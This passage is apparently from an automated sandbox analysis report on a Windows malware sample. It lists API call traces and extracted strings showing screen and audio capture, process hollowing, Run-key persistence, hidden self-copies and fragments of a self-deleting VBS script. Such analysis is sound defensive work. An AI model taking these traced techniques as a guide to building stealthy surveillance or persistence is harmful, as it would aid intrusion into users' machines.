                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                  • Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
                                                  • Opcode Fuzzy Hash: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                  • Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508
                                                  APIs
                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                  • GetCursorInfo.USER32(?), ref: 00418FE2
                                                  • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                  • DeleteObject.GDI32(?), ref: 00419027
                                                  • DeleteObject.GDI32(?), ref: 00419034
                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                  • DeleteDC.GDI32(?), ref: 004191B7
                                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                                  • GlobalFree.KERNEL32(?), ref: 00419283
                                                  • DeleteDC.GDI32(?), ref: 00419293
                                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                  • String ID: DISPLAY
                                                  • API String ID: 4256916514-865373369
                                                  • Opcode ID: 2247b608c21a3b8abac63767662b5221d2e7e1e487ff91865d3b7fb692dc0e69
                                                  • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                  • Opcode Fuzzy Hash: 2247b608c21a3b8abac63767662b5221d2e7e1e487ff91865d3b7fb692dc0e69
                                                  • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,86l,004752F0,?,pth_unenc), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("$xdF$xpF
                                                  • API String ID: 1861856835-1269936466
                                                  • Opcode ID: 779bd8c3fa979e6212a70a7ec10a956c9f97f6caeed947a2cb61efc57b251fae
                                                  • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                  • Opcode Fuzzy Hash: 779bd8c3fa979e6212a70a7ec10a956c9f97f6caeed947a2cb61efc57b251fae
                                                  • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                  • GetLastError.KERNEL32 ref: 004184B5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                  • API String ID: 4188446516-3035715614
                                                  • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                  • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                  • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                  • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,86l,004752F0,?,pth_unenc), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                  • ExitProcess.KERNEL32 ref: 0040D454
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: ")$.vbs$86l$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xdF$xpF
                                                  • API String ID: 3797177996-1628118058
                                                  • Opcode ID: dd8319ffc67d1054beefb8b0b566d77839d74a362affede773f697cf057b9661
                                                  • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                  • Opcode Fuzzy Hash: dd8319ffc67d1054beefb8b0b566d77839d74a362affede773f697cf057b9661
                                                  • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,`m,00000003), ref: 004124CF
                                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                  • String ID: .exe$8SG$WDH$`m$exepath$open$temp_
                                                  • API String ID: 2649220323-1962796519
                                                  • Opcode ID: e435387e35e817d7135507239b6fc27cf3dba481e6481675bd593b819796061a
                                                  • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                  • Opcode Fuzzy Hash: e435387e35e817d7135507239b6fc27cf3dba481e6481675bd593b819796061a
                                                  • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                  APIs
                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                  • SetEvent.KERNEL32 ref: 0041B2AA
                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                  • CloseHandle.KERNEL32 ref: 0041B2CB
                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                  • API String ID: 738084811-2094122233
                                                  • Opcode ID: cf2f536cfb4717a724ed957876631ab1db0d8eecf55f524aebf6ef92b2d3f5f5
                                                  • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                  • Opcode Fuzzy Hash: cf2f536cfb4717a724ed957876631ab1db0d8eecf55f524aebf6ef92b2d3f5f5
                                                  • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Write$Create
                                                  • String ID: RIFF$WAVE$data$fmt
                                                  • API String ID: 1602526932-4212202414
                                                  • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                  • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                  • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                  • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\FPPhfkcDCh.exe,00000001,00407688,C:\Users\user\Desktop\FPPhfkcDCh.exe,00000003,004076B0,86l,00407709), ref: 004072BF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: C:\Users\user\Desktop\FPPhfkcDCh.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                  • API String ID: 1646373207-399632292
                                                  • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                  • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                  • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                  • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040CE42
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,`m,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\FPPhfkcDCh.exe,00000000,00000000,00000000,00000000,00000000,?,`m,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                  • _wcslen.LIBCMT ref: 0040CF21
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\FPPhfkcDCh.exe,00000000,00000000), ref: 0040CFBF
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                  • _wcslen.LIBCMT ref: 0040D001
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,`m,0000000E), ref: 0040D068
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
